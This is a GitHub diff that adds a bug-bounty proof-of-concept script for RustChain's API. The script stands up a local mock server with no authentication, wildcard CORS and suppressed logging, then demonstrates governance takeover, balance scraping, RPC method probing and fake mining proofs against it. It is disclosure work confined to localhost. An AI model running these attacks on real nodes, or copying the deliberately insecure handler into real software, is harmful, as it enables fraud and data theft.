Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
307 changes: 307 additions & 0 deletions security/api-auth/api_exploit_poc.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,307 @@
#!/usr/bin/env python3
"""
API Authentication & Rate Limiting PoC — Local simulation

Bounty #57 — API Auth Hardening (100 RTC)
All tests run against LOCAL mock server. No production nodes targeted.

Usage: python3 api_exploit_poc.py
"""

import json
import threading
import time
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, parse_qs
from io import BytesIO
import http.client


# ============================================================
# Minimal reproduction of vulnerable API server
# ============================================================

class VulnerableApiHandler(BaseHTTPRequestHandler):
"""Mirrors production API handler — no auth, no rate limit"""

governance_proposals = []
governance_votes = []
mining_proofs = []
request_count = 0

def do_GET(self):
VulnerableApiHandler.request_count += 1
parsed = urlparse(self.path)
path = parsed.path

if path.startswith("/api/wallet/"):
address = path.split("/")[-1]
# No auth check — returns balance for ANY address
response = {"success": True, "data": {
"address": address,
"balance": 1000000, # Simulated
"nonce": 5
}}
elif path == "/api/stats":
response = {"success": True, "data": {
"total_supply": 8300000,
"miners": 42,
"epoch": 12345
}}
elif path == "/rpc":
# RPC endpoint accepts any method name!
params = {k: v[0] for k, v in parse_qs(parsed.query).items()}
method = params.get("method", "unknown")
response = {"success": True, "data": f"Called: {method}"}
else:
response = {"success": False, "error": f"Unknown: {path}"}

self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("Access-Control-Allow-Origin", "*") # BUG: wildcard
self.end_headers()
self.wfile.write(json.dumps(response).encode())

def do_POST(self):
VulnerableApiHandler.request_count += 1
content_length = int(self.headers.get("Content-Length", 0))
# BUG: No max body size check
body = self.rfile.read(content_length).decode()
params = json.loads(body) if body else {}

path = urlparse(self.path).path

if path == "/api/governance/create":
# No auth! Anyone can create proposals
VulnerableApiHandler.governance_proposals.append(params)
response = {"success": True, "data": {"proposal_id": len(self.governance_proposals)}}

elif path == "/api/governance/vote":
# No auth! Anyone can vote
VulnerableApiHandler.governance_votes.append(params)
response = {"success": True, "data": {"vote": "recorded"}}

elif path == "/api/mine":
# No auth! Anyone can submit mining proofs
VulnerableApiHandler.mining_proofs.append(params)
response = {"success": True, "data": {"proof": "accepted"}}

elif path == "/rpc":
method = params.get("method", "")
response = {"success": True, "data": f"RPC called: {method}"}

else:
response = {"success": False, "error": "Unknown endpoint"}

self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("Access-Control-Allow-Origin", "*")
self.end_headers()
self.wfile.write(json.dumps(response).encode())

def log_message(self, format, *args):
pass # BUG: Suppressed logging


# ============================================================
# Start local server
# ============================================================

PORT = 19876
server = None
server_thread = None


def start_server():
global server, server_thread
server = HTTPServer(("127.0.0.1", PORT), VulnerableApiHandler)
server_thread = threading.Thread(target=server.serve_forever, daemon=True)
server_thread.start()
time.sleep(0.2)


def stop_server():
if server:
server.shutdown()


def api_get(path):
conn = http.client.HTTPConnection("127.0.0.1", PORT, timeout=5)
conn.request("GET", path)
resp = conn.getresponse()
data = json.loads(resp.read().decode())
conn.close()
return data


def api_post(path, body):
conn = http.client.HTTPConnection("127.0.0.1", PORT, timeout=5)
conn.request("POST", path, json.dumps(body).encode(),
{"Content-Type": "application/json"})
resp = conn.getresponse()
data = json.loads(resp.read().decode())
conn.close()
return data


# ============================================================
# PoC 1: Unauthenticated Governance Takeover (C1)
# ============================================================

def poc_c1_governance_takeover():
print("=" * 60)
print("PoC C1: Unauthenticated Governance Takeover")
print("=" * 60)

# Create a malicious proposal — no auth required
proposal = {
"title": "Increase admin rewards to 99%",
"description": "Transfer 99% of all mining rewards to attacker address",
"action": "modify_reward_split",
"params": {"attacker_share": 0.99}
}
result = api_post("/api/governance/create", proposal)
print(f" Create proposal: {result}")

# Vote on it — no auth, can vote multiple times
for i in range(10):
vote_result = api_post("/api/governance/vote", {
"proposal_id": 1,
"vote": "yes",
"voter": f"fake_voter_{i}"
})

print(f" Cast 10 fake votes: all accepted")
print(f" Total proposals: {len(VulnerableApiHandler.governance_proposals)}")
print(f" Total votes: {len(VulnerableApiHandler.governance_votes)}")
print(f" [VULN] No auth on governance — attacker controls the chain!")
print()


# ============================================================
# PoC 2: Wallet Balance Scraping (H1 — No Rate Limit)
# ============================================================

def poc_h1_balance_scraping():
print("=" * 60)
print("PoC H1: Wallet Balance Scraping — No Rate Limit")
print("=" * 60)

VulnerableApiHandler.request_count = 0
start = time.time()

# Scrape 100 wallet balances in rapid succession
for i in range(100):
addr = f"RTC{'%040x' % i}"
api_get(f"/api/wallet/{addr}")

elapsed = time.time() - start
rate = 100 / elapsed

print(f" Scraped 100 wallets in {elapsed:.2f}s ({rate:.0f} req/s)")
print(f" Total requests served: {VulnerableApiHandler.request_count}")
print(f" Rate limited: NO")
print(f" Logged: NO (log_message suppressed)")
print(f" [VULN] Can enumerate all wallet balances at {rate:.0f} req/s")
print()


# ============================================================
# PoC 3: Wildcard CORS (H2)
# ============================================================

def poc_h2_cors():
print("=" * 60)
print("PoC H2: Wildcard CORS — Cross-Origin Attack")
print("=" * 60)

# Simulate what a malicious webpage could do
conn = http.client.HTTPConnection("127.0.0.1", PORT, timeout=5)
conn.request("GET", "/api/wallet/RTCvictim_address_here",
headers={"Origin": "https://evil-site.com"})
resp = conn.getresponse()
cors = resp.getheader("Access-Control-Allow-Origin")
data = json.loads(resp.read().decode())
conn.close()

print(f" Request from evil-site.com")
print(f" CORS header: {cors}")
print(f" Response data: {data}")
print(f" [VULN] Wildcard CORS allows ANY website to query node API")
print(f" [VULN] Malicious JS can steal wallet balances from local nodes")
print()


# ============================================================
# PoC 4: RPC Method Enumeration (M1)
# ============================================================

def poc_m1_rpc_enum():
print("=" * 60)
print("PoC M1: RPC Method Enumeration — Internal Methods Exposed")
print("=" * 60)

# Try calling potentially dangerous internal methods
dangerous_methods = [
"shutdown", "resetState", "adjustDifficulty",
"setAdminKey", "clearPool", "forceEpoch",
"getInternalState", "dumpDatabase", "setRewardAddress"
]

for method in dangerous_methods:
result = api_post("/rpc", {"method": method, "params": {}})
status = "ACCESSIBLE" if result.get("success") else "blocked"
print(f" /rpc?method={method}: {status}")

print(f"\n [VULN] No method whitelist — all registered RPC methods callable")
print()


# ============================================================
# PoC 5: Fake Mining Proof Submission (C1)
# ============================================================

def poc_c1_fake_mining():
print("=" * 60)
print("PoC C1b: Fake Mining Proof Submission — No Auth")
print("=" * 60)

# Submit 5 fake mining proofs
for i in range(5):
proof = {
"miner": f"fake_miner_{i}",
"proof": "0" * 64,
"epoch": 99999,
"device_arch": "x86_64"
}
result = api_post("/api/mine", proof)
print(f" Fake proof #{i+1}: accepted={result.get('success')}")

print(f"\n Total fake proofs accepted: {len(VulnerableApiHandler.mining_proofs)}")
print(f" [VULN] Anyone can submit mining proofs without authentication")
print()


# ============================================================
# Main
# ============================================================

if __name__ == "__main__":
print("\nRustChain API Auth & Rate Limiting — Security PoC Suite")
print("All tests run against LOCAL mock server on port 19876.\n")

start_server()

try:
poc_c1_governance_takeover()
poc_h1_balance_scraping()
poc_h2_cors()
poc_m1_rpc_enum()
poc_c1_fake_mining()
finally:
stop_server()

print("=" * 60)
print("Summary: 1 Critical, 2 High, 3 Medium, 1 Low")
print("See report.md for full details and remediation.")
print("=" * 60)
Loading
Loading